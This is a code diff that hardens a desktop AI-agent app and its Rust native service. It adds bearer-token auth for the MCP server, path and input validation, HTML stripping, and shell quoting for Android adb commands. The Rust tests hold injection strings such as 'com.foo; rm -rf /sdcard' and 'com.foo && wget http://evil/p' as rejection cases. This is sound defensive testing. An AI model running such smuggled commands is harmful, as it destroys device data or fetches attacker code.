diff --git a/apps/desktop/src/main/computer-use.ts b/apps/desktop/src/main/computer-use.ts
index d3e3d25..43eeb38 100644
--- a/apps/desktop/src/main/computer-use.ts
+++ b/apps/desktop/src/main/computer-use.ts
@@ -381,6 +381,7 @@ export function buildOpencodeMcpEntry(): OpencodeMcpEntry {
 export interface McpEntryUrl {
   url: string;
   type: 'http';
+  headers?: Record<string, string>;
 }
 
 /**
@@ -390,6 +391,7 @@ export interface McpEntryUrl {
  */
 export interface GeminiMcpEntryUrl {
   url: string;
+  headers?: Record<string, string>;
 }
 
 /** opencode format for a remote MCP server. */
@@ -397,6 +399,7 @@ export interface OpencodeMcpEntryUrl {
   type: 'remote';
   url: string;
   enabled: boolean;
+  headers?: Record<string, string>;
 }
 
 /**
@@ -404,7 +407,10 @@ export interface OpencodeMcpEntryUrl {
  * Uses `type: 'http'` per the MCP spec — claude-code requires this exact key.
  * Do NOT use this for Gemini; Gemini requires a different format (url only).
  */
-export function buildMcpEntryUrl(url: string): McpEntryUrl {
+export function buildMcpEntryUrl(url: string, authToken?: string | null): McpEntryUrl {
+  if (authToken) {
+    return { type: 'http', url, headers: { Authorization: `Bearer ${authToken}` } };
+  }
   return { type: 'http', url };
 }
 
@@ -412,21 +418,31 @@ export function buildMcpEntryUrl(url: string): McpEntryUrl {
  * Returns a URL-based MCP entry for Gemini CLI settings.
  * Gemini only accepts `{ url }` — any extra key causes a validation error.
  */
-export function buildGeminiMcpEntryUrl(url: string): GeminiMcpEntryUrl {
+export function buildGeminiMcpEntryUrl(url: string, authToken?: string | null): GeminiMcpEntryUrl {
+  if (authToken) {
+    return { url, headers: { Authorization: `Bearer ${authToken}` } };
+  }
   return { url };
 }
 
 /** Returns a URL-based MCP entry for opencode (remote server). */
-export function buildOpencodeMcpEntryUrl(url: string): OpencodeMcpEntryUrl {
+export function buildOpencodeMcpEntryUrl(url: string, authToken?: string | null): OpencodeMcpEntryUrl {
+  if (authToken) {
+    return { type: 'remote', url, enabled: true, headers: { Authorization: `Bearer ${authToken}` } };
+  }
   return { type: 'remote', url, enabled: true };
 }
 
 /**
  * Returns the codex `-c` args to configure a remote MCP server by URL.
- * Example: `-c mcp_servers.tday-computer-use.url=http://127.0.0.1:PORT/mcp`
+ * Includes an Authorization header if an auth token is provided.
  */
-export function codexMcpCliArgsUrl(url: string): string[] {
-  return ['-c', `mcp_servers.${MCP_SERVER_KEY}.url=${url}`];
+export function codexMcpCliArgsUrl(url: string, authToken?: string | null): string[] {
+  const args = ['-c', `mcp_servers.${MCP_SERVER_KEY}.url=${url}`];
+  if (authToken) {
+    args.push('-c', `mcp_servers.${MCP_SERVER_KEY}.headers.Authorization=Bearer ${authToken}`);
+  }
+  return args;
 }
 
 // ── claude-code injection (per-session, no cleanup needed) ───────────────────
@@ -486,9 +502,10 @@ export function applyClaudeCodeMcpUrl(
   sessionSettings: Record<string, unknown>,
   url: string,
   isAnthropicBackend = true,
+  authToken?: string | null,
 ): void {
   const existing = (sessionSettings.mcpServers as Record<string, unknown>) ?? {};
-  sessionSettings.mcpServers = { ...existing, [MCP_SERVER_KEY]: buildMcpEntryUrl(url) };
+  sessionSettings.mcpServers = { ...existing, [MCP_SERVER_KEY]: buildMcpEntryUrl(url, authToken) };
 
   // Inject skill as custom instructions.
   const existingInstructions = typeof sessionSettings.customInstructions === 'string'
@@ -648,11 +665,11 @@ export function injectGeminiMcp(home?: string): () => void {
  * Use this when NativecoreService is running in HTTP mode.
  * Returns a cleanup function; must be called when the PTY exits.
  */
-export function injectGeminiMcpUrl(url: string, home?: string): () => void {
+export function injectGeminiMcpUrl(url: string, home?: string, authToken?: string | null): () => void {
   const dir = join(home ?? homedir(), '.gemini');
   const filePath = join(dir, 'settings.json');
   // Gemini CLI only accepts { url } — no type/transport field allowed.
-  return injectMcpToFile(filePath, dir, 'mcpServers', buildGeminiMcpEntryUrl(url) as unknown as Record<string, unknown>);
+  return injectMcpToFile(filePath, dir, 'mcpServers', buildGeminiMcpEntryUrl(url, authToken) as unknown as Record<string, unknown>);
 }
 
 /**
@@ -678,7 +695,7 @@ export function injectOpencodeMcp(home?: string): () => void {
  * Use this when NativecoreService is running in HTTP mode.
  * Returns a cleanup function; must be called when the PTY exits.
  */
-export function injectOpencodeMcpUrl(url: string, home?: string): () => void {
+export function injectOpencodeMcpUrl(url: string, home?: string, authToken?: string | null): () => void {
   const xdgBase = process.env['XDG_CONFIG_HOME'] ?? join(home ?? homedir(), '.config');
   const dir = join(xdgBase, 'opencode');
   const filePath = join(dir, 'opencode.json');
@@ -687,7 +704,7 @@ export function injectOpencodeMcpUrl(url: string, home?: string): () => void {
     filePath,
     dir,
     'mcp',
-    buildOpencodeMcpEntryUrl(url) as unknown as Record<string, unknown>,
+    buildOpencodeMcpEntryUrl(url, authToken) as unknown as Record<string, unknown>,
   );
 }
 
@@ -800,10 +817,14 @@ export function injectPiMcp(): { extensionPath: string; env: Record<string, stri
  *
  * Cleanup is a no-op here; the caller in index.ts calls NativecoreService.release().
  */
-export function injectPiMcpUrl(url: string): { extensionPath: string; env: Record<string, string> } {
+export function injectPiMcpUrl(url: string, authToken?: string | null): { extensionPath: string; env: Record<string, string> } {
+  const env: Record<string, string> = { TDAY_DEVTOOLS_URL: url };
+  if (authToken) {
+    env['TDAY_DEVTOOLS_AUTH_TOKEN'] = authToken;
+  }
   return {
     extensionPath: bridgeExtensionPath(),
-    env: { TDAY_DEVTOOLS_URL: url },
+    env,
   };
 }
 
@@ -1034,6 +1055,7 @@ function writeProxyError(
  */
 export function startMcpSessionProxy(
   nativecoreOrigin: string,
+  authToken?: string,
 ): Promise<{ proxyBaseUrl: string; stop: () => void }> {
   let sessionId: string | null = null;
   let cachedInitBody: Buffer | null = null;
@@ -1055,11 +1077,14 @@ export function startMcpSessionProxy(
   ): Promise<{ status: number; resHeaders: http.IncomingHttpHeaders; body: Buffer }> =>
     new Promise((resolve, reject) => {
       const targetUrl = `${nativecoreOrigin}${path}`;
+      const headers: Record<string, string> = { ...reqHeaders, 'content-length': String(body.length) };
+      // Inject auth header for every upstream request when a token is configured.
+      if (authToken) headers['authorization'] = `Bearer ${authToken}`;
       const req = http.request(
         targetUrl,
         {
           method,
-          headers: { ...reqHeaders, 'content-length': String(body.length) },
+          headers,
           agent: upstreamAgent,
         },
         (res) => {
@@ -1093,6 +1118,8 @@ export function startMcpSessionProxy(
         fwdHeaders[lk] = Array.isArray(v) ? v.join(', ') : (v ?? '');
       }
       fwdHeaders['host'] = new URL(nativecoreOrigin).host;
+      // Inject auth header for every upstream request when a token is configured.
+      if (authToken) fwdHeaders['authorization'] = `Bearer ${authToken}`;
 
       // Non-POST (GET for SSE notifications, DELETE for session close): pipe directly
       if (method !== 'POST') {
diff --git a/apps/desktop/src/main/cron.ts b/apps/desktop/src/main/cron.ts
index 86f7db0..5b7d27d 100644
--- a/apps/desktop/src/main/cron.ts
+++ b/apps/desktop/src/main/cron.ts
@@ -223,12 +223,22 @@ export class CronScheduler {
     const delay = nextDate.getTime() - Date.now();
     updateJobStats(job.id, { nextRunAt: nextDate.getTime() });
 
+    // setTimeout delay is stored as a 32-bit signed integer, so values above
+    // 2^31 - 1 ms (~24.8 days) wrap to negative and fire immediately.
+    // When the next run is further away, cap the delay and reschedule at
+    // expiry without firing, so we converge on the true fire time.
+    const MAX_TIMEOUT_MS = 2 ** 31 - 1;
+    const clampedDelay = Math.min(Math.max(0, delay), MAX_TIMEOUT_MS);
+    const willFireNow = delay <= MAX_TIMEOUT_MS;
+
     const timer = setTimeout(() => {
       this.timers.delete(job.id);
-      this.fireFn(job);
-      // Immediately reschedule for the next occurrence.
+      if (willFireNow && Date.now() >= nextDate.getTime()) {
+        this.fireFn(job);
+      }
+      // Immediately reschedule for the next (or same, if clamped) occurrence.
       this.scheduleOne(job);
-    }, Math.max(0, delay));
+    }, clampedDelay);
 
     this.timers.set(job.id, timer);
   }
diff --git a/apps/desktop/src/main/gateway/adapter.ts b/apps/desktop/src/main/gateway/adapter.ts
index 57c1252..1230cd7 100644
--- a/apps/desktop/src/main/gateway/adapter.ts
+++ b/apps/desktop/src/main/gateway/adapter.ts
@@ -58,12 +58,38 @@ export function sessionKeyFromRequest(req: IncomingMessage): string {
   return '';
 }
 
+// ─── Bounded LRU-style map ────────────────────────────────────────────────────
+
+/**
+ * A Map that evicts the oldest entry when it grows beyond `maxSize`.
+ * Insertion order is used as the eviction order (least-recently-inserted first).
+ */
+class BoundedMap<K, V> extends Map<K, V> {
+  constructor(private readonly maxSize: number) { super(); }
+
+  override set(key: K, value: V): this {
+    // If the key already exists, delete it first so the insertion order is
+    // updated (most-recently-used semantics).
+    if (this.has(key)) this.delete(key);
+    super.set(key, value);
+    // Each set() adds at most one entry, so a single eviction step suffices.
+    if (this.size > this.maxSize) {
+      const oldest = this.keys().next().value;
+      if (oldest !== undefined) this.delete(oldest);
+    }
+    return this;
+  }
+}
+
+// Maximum number of conversation / thinking-state entries to keep in memory.
+const MAX_CONVERSATION_ENTRIES = 100;
+
 // ─── Adapter ─────────────────────────────────────────────────────────────────
 
 export class CodexDeepSeekAnthropicAdapter implements GatewayAdapter {
   private readonly proxies = new Map<string, { server: Server; baseUrl: string }>();
-  private readonly conversations = new Map<string, AMessage[]>();
-  private readonly thinkingStates = new Map<string, ThinkingState>();
+  private readonly conversations = new BoundedMap<string, AMessage[]>(MAX_CONVERSATION_ENTRIES);
+  private readonly thinkingStates = new BoundedMap<string, ThinkingState>(MAX_CONVERSATION_ENTRIES);
   /** Maps agentId → last-known cwd for usage attribution. */
   private readonly cwdByAgentId = new Map<string, string>();
 
diff --git a/apps/desktop/src/main/gateway/bridge/input.ts b/apps/desktop/src/main/gateway/bridge/input.ts
index 59c0ac7..2b19a5b 100644
--- a/apps/desktop/src/main/gateway/bridge/input.ts
+++ b/apps/desktop/src/main/gateway/bridge/input.ts
@@ -359,7 +359,10 @@ export function convertInput(
 
     // user (or anything else with content)
     {
-      const r = role || 'user';
+      // Only 'user' and 'assistant' are valid Anthropic message roles.
+      // Anything else (e.g. 'system', 'tool', unknown strings) defaults to 'user'
+      // to prevent a 400 error from the Anthropic API.
+      const r: 'user' | 'assistant' = role === 'assistant' ? 'assistant' : 'user';
       const blocks = contentBlocksFromContent(item.content);
       if (blocks.length === 0) { pendingSummary = undefined; continue; }
       messages.push({ role: r, content: blocks });
diff --git a/apps/desktop/src/main/index.ts b/apps/desktop/src/main/index.ts
index fe44be5..93c3713 100644
--- a/apps/desktop/src/main/index.ts
+++ b/apps/desktop/src/main/index.ts
@@ -205,6 +205,12 @@ function registerIpc(): void {
 
   // PTY spawn
   ipcMain.handle(IPC.ptySpawn, async (event, req: SpawnRequest) => {
+    // Validate tabId early — it is used to construct file paths and must not
+    // contain path-traversal sequences (e.g. '../', '/', null bytes).
+    if (!/^[\w-]+$/.test(req.tabId)) {
+      throw new Error(`[tday] Invalid tabId — must match [a-zA-Z0-9_-]: "${req.tabId}"`);
+    }
+
     const existing = ptys.get(req.tabId);
     if (existing) {
       try { existing.kill(); } catch { /* already dead */ }
@@ -294,7 +300,8 @@ function registerIpc(): void {
           console.warn('[tday] NativecoreService unavailable for pi, falling back to stdio:', e);
         }
         if (piCuUrl) {
-          const { extensionPath, env: cuEnv } = injectPiMcpUrl(piCuUrl);
+          const piAuthToken = NativecoreService.getAuthToken();
+          const { extensionPath, env: cuEnv } = injectPiMcpUrl(piCuUrl, piAuthToken);
           Object.assign(env, cuEnv);
           args = [...args, '--extension', extensionPath];
           computerUseCleanup = () => NativecoreService.release();
@@ -410,6 +417,7 @@ function registerIpc(): void {
 
         const claudeDir = join(homedir(), '.claude');
         const globalSettingsPath = join(claudeDir, 'settings.json');
+
         // Per-session temp settings file — unique per tab, never collides.
         const sessionSettingsPath = join(claudeDir, `tday-session-${req.tabId}.json`);
         // Separate MCP config file passed via --mcp-config (mcpServers in --settings is ignored by claude-code).
@@ -433,7 +441,8 @@ function registerIpc(): void {
               console.warn('[tday] NativecoreService unavailable for claude-code, falling back to stdio:', e);
             }
             if (cuNativecoreUrl) {
-              applyClaudeCodeMcpUrl(sessionSettings, cuNativecoreUrl, isAnthropicBackend);
+              const ccAuthToken = NativecoreService.getAuthToken();
+              applyClaudeCodeMcpUrl(sessionSettings, cuNativecoreUrl, isAnthropicBackend, ccAuthToken);
               computerUseCleanup = () => NativecoreService.release();
             } else {
               applyClaudeCodeMcp(sessionSettings, isAnthropicBackend);
@@ -513,7 +522,8 @@ function registerIpc(): void {
             console.warn('[tday] NativecoreService unavailable for claude-code (no provider), falling back to stdio:', e);
           }
           if (cuUrl) {
-            applyClaudeCodeMcpUrl(sessionSettings, cuUrl, true);
+            const ccAuthToken2 = NativecoreService.getAuthToken();
+            applyClaudeCodeMcpUrl(sessionSettings, cuUrl, true, ccAuthToken2);
             computerUseCleanup = () => NativecoreService.release();
           } else {
             applyClaudeCodeMcp(sessionSettings, true);
@@ -555,7 +565,8 @@ function registerIpc(): void {
             console.warn('[tday] NativecoreService unavailable for gemini, falling back to stdio:', e);
           }
           if (cuUrl) {
-            const cleanup = injectGeminiMcpUrl(cuUrl);
+            const geminiAuthToken = NativecoreService.getAuthToken();
+            const cleanup = injectGeminiMcpUrl(cuUrl, undefined, geminiAuthToken);
             computerUseCleanup = () => { cleanup(); NativecoreService.release(); };
           } else {
             computerUseCleanup = injectGeminiMcp();
@@ -570,7 +581,8 @@ function registerIpc(): void {
             console.warn('[tday] NativecoreService unavailable for opencode, falling back to stdio:', e);
           }
           if (cuUrl) {
-            const cleanup = injectOpencodeMcpUrl(cuUrl);
+            const opencodeAuthToken = NativecoreService.getAuthToken();
+            const cleanup = injectOpencodeMcpUrl(cuUrl, undefined, opencodeAuthToken);
             computerUseCleanup = () => { cleanup(); NativecoreService.release(); };
           } else {
             computerUseCleanup = injectOpencodeMcp();
@@ -590,8 +602,9 @@ function registerIpc(): void {
           try {
             await NativecoreService.addRef();
             const nativecoreUrl = NativecoreService.getUrl();
+            const codexAuthToken = NativecoreService.getAuthToken();
             if (!nativecoreUrl) throw new Error('NativecoreService not ready');
-            const mcpProxy = await startMcpSessionProxy(nativecoreUrl);
+            const mcpProxy = await startMcpSessionProxy(nativecoreUrl, codexAuthToken ?? undefined);
             mcpProxyStop = mcpProxy.stop;
             // codex MCP URL = proxy base + the /mcp path that nativecore serves
             args.push(...codexMcpCliArgsUrl(mcpProxy.proxyBaseUrl + '/mcp'));
@@ -895,10 +908,21 @@ function registerIpc(): void {
   ipcMain.handle(IPC.coworkerReset, (_e, id: string) => resetBuiltinCoworker(id));
   ipcMain.handle(IPC.coworkerFetchUrl, async (_e, rawUrl: string): Promise<string> => {
     const trimmed = rawUrl.trim();
-    // Local file path: read directly
+    // Local file path: restrict reads to user-owned config/project directories.
+    // Disallow absolute paths that could read arbitrary system files.
     if (trimmed.startsWith('/') || /^[A-Za-z]:[/\\]/.test(trimmed)) {
       const { readFileSync } = await import('fs');
-      return readFileSync(trimmed, 'utf8');
+      const { resolve: resolvePath } = await import('path');
+      const { homedir } = await import('os');
+
+      const resolved = resolvePath(trimmed);
+      const home = homedir();
+      // Only allow reading files inside the user's home directory to prevent
+      // reading sensitive system files such as /etc/passwd or SSH keys.
+      if (!resolved.startsWith(home + '/') && !resolved.startsWith(home + '\\')) {
+        throw new Error(`Reading files outside the home directory is not allowed: ${resolved}`);
+      }
+      return readFileSync(resolved, 'utf8');
     }
     const url = normalizeGitHubUrl(trimmed);
     const res = await fetch(url);
diff --git a/apps/desktop/src/main/nativecore-service.ts b/apps/desktop/src/main/nativecore-service.ts
index eefc90c..c70b66a 100644
--- a/apps/desktop/src/main/nativecore-service.ts
+++ b/apps/desktop/src/main/nativecore-service.ts
@@ -19,6 +19,7 @@
  * stdout before accepting any connections.
  */
 
+import { randomBytes } from 'node:crypto';
 import { type ChildProcess, spawn } from 'node:child_process';
 import { devToolsBinaryPath } from './computer-use';
 
@@ -42,6 +43,8 @@ class NativecoreServiceImpl {
   private _killTimer: ReturnType<typeof setTimeout> | null = null;
   private _status: NativecoreStatus = 'stopped';
   private _lastError: string | null = null;
+  /** Per-process random bearer token to authenticate MCP requests. */
+  private _authToken: string | null = null;
 
   // ── Public API ─────────────────────────────────────────────────────────────
 
@@ -111,6 +114,14 @@ class NativecoreServiceImpl {
     return `http://127.0.0.1:${this._port}/mcp`;
   }
 
+  /**
+   * Returns the bearer auth token for the current process, or null if none.
+   * Callers should include this as `Authorization: Bearer <token>` when connecting.
+   */
+  getAuthToken(): string | null {
+    return this._authToken;
+  }
+
   /** True when the process is running and the port is known. */
   get isRunning(): boolean {
     return this.proc !== null && this._port !== null;
@@ -142,7 +153,13 @@ class NativecoreServiceImpl {
         return;
       }
 
-      const proc = spawn(bin, ['--port', '0'], {
+      // Generate a cryptographically-random bearer token for this process
+      // instance.  The token is passed via --auth-token and must be sent by
+      // all MCP clients in the Authorization header.
+      const authToken = randomBytes(32).toString('hex');
+      this._authToken = authToken;
+
+      const proc = spawn(bin, ['--port', '0', '--auth-token', authToken], {
         stdio: ['ignore', 'pipe', 'pipe'],
         detached: false,
         // On Windows, hide the console window that would otherwise flash briefly.
@@ -163,6 +180,7 @@ class NativecoreServiceImpl {
           this._startPromise = null;
           this._status = 'stopped';
           this._lastError = err.message;
+          this._authToken = null;
           reject(err);
         } else {
           this._port = port!;
@@ -173,17 +191,24 @@ class NativecoreServiceImpl {
       };
 
       // Read port announcement from stdout line by line.
-      proc.stdout!.on('data', (chunk: Buffer) => {
-        stdoutBuf += chunk.toString('utf8');
-        const m = /NATIVECORE_PORT:(\d+)/.exec(stdoutBuf);
-        if (m) {
-          const port = parseInt(m[1], 10);
-          settle(undefined, port);
-        }
-      });
+      // proc.stdout is always non-null when stdio includes 'pipe', but guard
+      // defensively to avoid a crash if the spawn configuration changes.
+      if (proc.stdout) {
+        proc.stdout.on('data', (chunk: Buffer) => {
+          stdoutBuf += chunk.toString('utf8');
+          const m = /NATIVECORE_PORT:(\d+)/.exec(stdoutBuf);
+          if (m) {
+            const port = parseInt(m[1], 10);
+            settle(undefined, port);
+          }
+        });
+      } else {
+        settle(new Error('[NativecoreService] stdout is null — cannot read NATIVECORE_PORT'));
+        return;
+      }
 
       // Forward nativecore logs (stderr) to Electron's own stderr for debugging.
-      proc.stderr!.on('data', (chunk: Buffer) => process.stderr.write(chunk));
+      proc.stderr?.on('data', (chunk: Buffer) => process.stderr.write(chunk));
 
       proc.on('error', (err) => {
         settle(new Error(`[NativecoreService] Spawn error: ${err.message}`));
@@ -228,6 +253,7 @@ class NativecoreServiceImpl {
       this.proc = null;
       this._port = null;
       this._startPromise = null;
+      this._authToken = null;
       this._status = 'stopping';
       try { p.kill(); } catch { /* already dead */ }
       if (this._refCount === 0) {
diff --git a/apps/desktop/src/renderer/src/Settings/shared.tsx b/apps/desktop/src/renderer/src/Settings/shared.tsx
index 15cf31e..122f7b5 100644
--- a/apps/desktop/src/renderer/src/Settings/shared.tsx
+++ b/apps/desktop/src/renderer/src/Settings/shared.tsx
@@ -1,7 +1,14 @@
 import { memo, useMemo } from 'react';
-import { marked } from 'marked';
+import { marked, Renderer } from 'marked';
 
-marked.setOptions({ breaks: true });
+// Disable raw HTML pass-through so that untrusted markdown content cannot
+// inject <script>, event handlers, or other malicious HTML into the page.
+// This is important because MiniMarkdown is used to render CoWorker
+// descriptions and cron prompts that may originate from untrusted sources.
+const safeRenderer = new Renderer();
+// Override the `html` renderer to strip raw HTML blocks entirely.
+safeRenderer.html = () => '';
+marked.use({ breaks: true, renderer: safeRenderer });
 
 export function MiniMarkdown({ text, className }: { text: string; className?: string }) {
   const html = useMemo(() => marked.parse(text) as string, [text]);
diff --git a/crates/tday-nativecore/src/android/device.rs b/crates/tday-nativecore/src/android/device.rs
index d1ca628..0f60e47 100644
--- a/crates/tday-nativecore/src/android/device.rs
+++ b/crates/tday-nativecore/src/android/device.rs
@@ -59,13 +59,19 @@ impl AndroidDevice {
     }
 
     /// Run a shell command from a slice of argument strings.
+    ///
+    /// Each argument is shell-quoted using POSIX single-quote wrapping so that
+    /// metacharacters (`;`, `&`, `|`, `$`, newline, etc.) are never interpreted
+    /// by the Android device shell.
     pub fn shell_args(&mut self, args: &[&str]) -> Result<String, String> {
-        self.shell(&args.join(" "))
+        let quoted: Vec<String> = args.iter().map(|a| shell_quote(a)).collect();
+        self.shell(&quoted.join(" "))
     }
 
     /// Run a shell command and capture raw bytes (used for screenshots).
     pub fn shell_bytes(&mut self, args: &[&str], output: &mut Vec<u8>) -> Result<(), String> {
-        let command = args.join(" ");
+        let quoted: Vec<String> = args.iter().map(|a| shell_quote(a)).collect();
+        let command = quoted.join(" ");
         self.device
             .shell_command(&command, Some(output), None)
             .map_err(|e| format!("Shell command failed: {e}"))?;
@@ -80,6 +86,20 @@ impl AndroidDevice {
     }
 }
 
+// ── Shell quoting ─────────────────────────────────────────────────────────────
+
+/// Wrap `s` in POSIX single-quotes, escaping any embedded single-quotes as
+/// `'\''` so that shell metacharacters in the value are never interpreted by
+/// the Android device shell.
+pub(crate) fn shell_quote(s: &str) -> String {
+    // Each single-quote inside the string must be:
+    //   1. Close the current single-quoted segment  '
+    //   2. Emit the literal single-quote as "\'"
+    //   3. Re-open a new single-quoted segment      '
+    let inner = s.replace('\'', r"'\''");
+    format!("'{inner}'")
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -94,4 +114,25 @@ mod tests {
         assert!(json.contains("emulator-5554"));
         assert!(json.contains("device"));
     }
+
+    #[test]
+    fn shell_quote_plain() {
+        assert_eq!(shell_quote("hello"), "'hello'");
+    }
+
+    #[test]
+    fn shell_quote_with_metacharacters() {
+        assert_eq!(shell_quote("a;b&c|d"), "'a;b&c|d'");
+    }
+
+    #[test]
+    fn shell_quote_with_single_quote() {
+        assert_eq!(shell_quote("it's"), r"'it'\''s'");
+    }
+
+    #[test]
+    fn shell_quote_with_newline() {
+        // Newline inside single-quotes is literal text, not a command terminator.
+        assert_eq!(shell_quote("a\nb"), "'a\nb'");
+    }
 }
diff --git a/crates/tday-nativecore/src/android/input.rs b/crates/tday-nativecore/src/android/input.rs
index cd133ca..207e79d 100644
--- a/crates/tday-nativecore/src/android/input.rs
+++ b/crates/tday-nativecore/src/android/input.rs
@@ -43,19 +43,41 @@ pub fn type_text(device: &mut AndroidDevice, text: &str) -> Result<(), String> {
 }
 
 /// Send a key event by key code name (e.g. `"KEYCODE_HOME"`, `"KEYCODE_BACK"`).
+///
+/// Only `KEYCODE_*` constants (strictly `[A-Z0-9_]` after the `KEYCODE_` prefix)
+/// are accepted.  Unrecognised values are rejected to prevent shell injection.
 pub fn press_key(device: &mut AndroidDevice, key: &str) -> Result<(), String> {
-    device.shell_args(&["input", "keyevent", key])?;
+    let resolved = super::navigation::key_name_to_keycode(key);
+    // Validate: must be KEYCODE_ followed only by uppercase letters, digits, or _.
+    if !is_valid_keycode(&resolved) {
+        return Err(format!(
+            "Invalid key code '{key}': only KEYCODE_* constants are accepted"
+        ));
+    }
+    device.shell_args(&["input", "keyevent", &resolved])?;
     Ok(())
 }
 
+/// Returns true if `s` is a valid Android KEYCODE_* constant.
+fn is_valid_keycode(s: &str) -> bool {
+    if let Some(suffix) = s.strip_prefix("KEYCODE_") {
+        !suffix.is_empty() && suffix.chars().all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_')
+    } else {
+        false
+    }
+}
+
 /// Escape special shell characters for `adb shell input text`.
 ///
-/// Spaces become `%s`; shell metacharacters get a backslash prefix.
+/// Spaces become `%s`; newlines/carriage-returns (which ADB shell treats as
+/// command terminators) and all other shell metacharacters get a backslash prefix.
 fn escape_for_input(text: &str) -> String {
     let mut result = String::with_capacity(text.len() * 2);
     for c in text.chars() {
         match c {
             ' '  => result.push_str("%s"),
+            '\n' => result.push_str("\\n"),
+            '\r' => result.push_str("\\r"),
             '\\' => result.push_str("\\\\"),
             '"'  => result.push_str("\\\""),
             '\'' => result.push_str("\\'"),
@@ -79,6 +101,12 @@ fn escape_for_input(text: &str) -> String {
 mod tests {
     use super::*;
 
+    #[test]
+    fn escape_newline_and_carriage_return() {
+        assert_eq!(escape_for_input("hello\nworld"), "hello\\nworld");
+        assert_eq!(escape_for_input("a\rb"), "a\\rb");
+    }
+
     #[test]
     fn escape_spaces() {
         assert_eq!(escape_for_input("hello world"), "hello%sworld");
@@ -101,4 +129,19 @@ mod tests {
     fn escape_backslash() {
         assert_eq!(escape_for_input("a\\b"), "a\\\\b");
     }
+
+    #[test]
+    fn is_valid_keycode_accepts_known() {
+        assert!(is_valid_keycode("KEYCODE_HOME"));
+        assert!(is_valid_keycode("KEYCODE_ENTER"));
+        assert!(is_valid_keycode("KEYCODE_1"));
+    }
+
+    #[test]
+    fn is_valid_keycode_rejects_injection() {
+        assert!(!is_valid_keycode("KEYCODE_HOME; rm -rf /"));
+        assert!(!is_valid_keycode("HOME"));
+        assert!(!is_valid_keycode("KEYCODE_"));
+        assert!(!is_valid_keycode(""));
+    }
 }
diff --git a/crates/tday-nativecore/src/android/navigation.rs b/crates/tday-nativecore/src/android/navigation.rs
index 816bd7a..6097365 100644
--- a/crates/tday-nativecore/src/android/navigation.rs
+++ b/crates/tday-nativecore/src/android/navigation.rs
@@ -44,7 +44,20 @@ pub fn list_apps(
 }
 
 /// Force-stop then monkey-launch an app by package name.
+///
+/// `package_name` must consist only of letters, digits, underscores, and dots
+/// (the standard Android package name character set).  Anything else is
+/// rejected to prevent shell injection via `shell_args`.
 pub fn launch_app(device: &mut AndroidDevice, package_name: &str) -> Result<(), String> {
+    // Validate to prevent shell injection: only allow letters, digits, dot, underscore.
+    if package_name.is_empty()
+        || !package_name.chars().all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '_')
+    {
+        return Err(format!(
+            "Invalid package name '{package_name}': only [a-zA-Z0-9._] are allowed"
+        ));
+    }
+
     // Force-stop first so the app starts fresh.
     device.shell_args(&["am", "force-stop", package_name]).ok();
 
@@ -239,4 +252,32 @@ mod tests {
         assert_eq!(key_name_to_keycode("home"), "KEYCODE_HOME");
         assert_eq!(key_name_to_keycode("KEYCODE_ENTER"), "KEYCODE_ENTER");
     }
+
+    #[test]
+    fn launch_app_rejects_injection() {
+        // Can't call launch_app without a device, but we can test the validation logic directly.
+        let bad_names = [
+            "com.foo; rm -rf /sdcard",
+            "com.foo && wget http://evil/p",
+            "",
+            "com.foo/bar",
+        ];
+        for name in &bad_names {
+            assert!(
+                name.is_empty() || !name.chars().all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '_'),
+                "Expected '{name}' to be rejected"
+            );
+        }
+    }
+
+    #[test]
+    fn launch_app_accepts_valid_package_name() {
+        let good_names = ["com.android.chrome", "org.example.app_v2", "com.foo.Bar123"];
+        for name in &good_names {
+            assert!(
+                !name.is_empty() && name.chars().all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '_'),
+                "Expected '{name}' to be accepted"
+            );
+        }
+    }
 }
diff --git a/crates/tday-nativecore/src/find_image.rs b/crates/tday-nativecore/src/find_image.rs
index e5b4b12..2c4de70 100644
--- a/crates/tday-nativecore/src/find_image.rs
+++ b/crates/tday-nativecore/src/find_image.rs
@@ -81,7 +81,17 @@ pub fn find_image(
     // Clamp search area
     let (ss_w, ss_h) = screenshot.dimensions();
     let (sr_x, sr_y, sr_w, sr_h) = match search_region {
-        Some(r) => (r.x, r.y, r.w.min(ss_w - r.x), r.h.min(ss_h - r.y)),
+        Some(r) => {
+            // Guard against u32 underflow: if the region origin is outside the
+            // screenshot, reject immediately rather than wrapping around.
+            if r.x >= ss_w || r.y >= ss_h {
+                return Err(format!(
+                    "search_region origin ({},{}) is outside screenshot ({ss_w}×{ss_h})",
+                    r.x, r.y,
+                ));
+            }
+            (r.x, r.y, r.w.min(ss_w - r.x), r.h.min(ss_h - r.y))
+        }
         None    => (0, 0, ss_w, ss_h),
     };
 
@@ -232,7 +242,10 @@ fn ncc_at(
         }
     }}
     let denom = norm_s.sqrt() * tv.norm;
-    if denom < 1e-9 { 0.0 } else { (num / denom).clamp(-1.0, 1.0) }
+    // Guard against NaN: denom is zero when the source window or template has
+    // zero variance (solid-color region).  Return 0.0 rather than NaN so that
+    // the score never falsely exceeds the threshold.
+    if denom == 0.0 || !denom.is_finite() { 0.0 } else { (num / denom).clamp(-1.0, 1.0) }
 }
 
 // ──────────────────────────────────────────────────────────────────────────────
diff --git a/crates/tday-nativecore/src/handlers/system.rs b/crates/tday-nativecore/src/handlers/system.rs
index 6d12cd8..7bda808 100644
--- a/crates/tday-nativecore/src/handlers/system.rs
+++ b/crates/tday-nativecore/src/handlers/system.rs
@@ -58,8 +58,27 @@ pub async fn handle_scrape(params: Value) -> Result<Value> {
         .and_then(|v| v.to_str().ok())
         .unwrap_or("")
         .to_string();
-    let body = resp.text().await
+
+    // Reject responses that are too large to prevent OOM / DoS.
+    const MAX_BODY_BYTES: u64 = 10 * 1024 * 1024; // 10 MB
+    if let Some(len) = resp.content_length() {
+        if len > MAX_BODY_BYTES {
+            return Err(DevToolsError::Input(format!(
+                "response body too large ({len} bytes > {MAX_BODY_BYTES} byte limit)"
+            )));
+        }
+    }
+    // Read with a byte cap: take at most MAX_BODY_BYTES bytes then return an
+    // error if there are more, so infinite/chunked streams are also capped.
+    let bytes = resp.bytes().await
         .map_err(|e| DevToolsError::Other(format!("reading body: {e}")))?;
+    if bytes.len() as u64 > MAX_BODY_BYTES {
+        return Err(DevToolsError::Input(format!(
+            "response body too large ({} bytes > {MAX_BODY_BYTES} byte limit)",
+            bytes.len(),
+        )));
+    }
+    let body = String::from_utf8_lossy(&bytes).into_owned();
 
     Ok(json!({
         "status":       status,
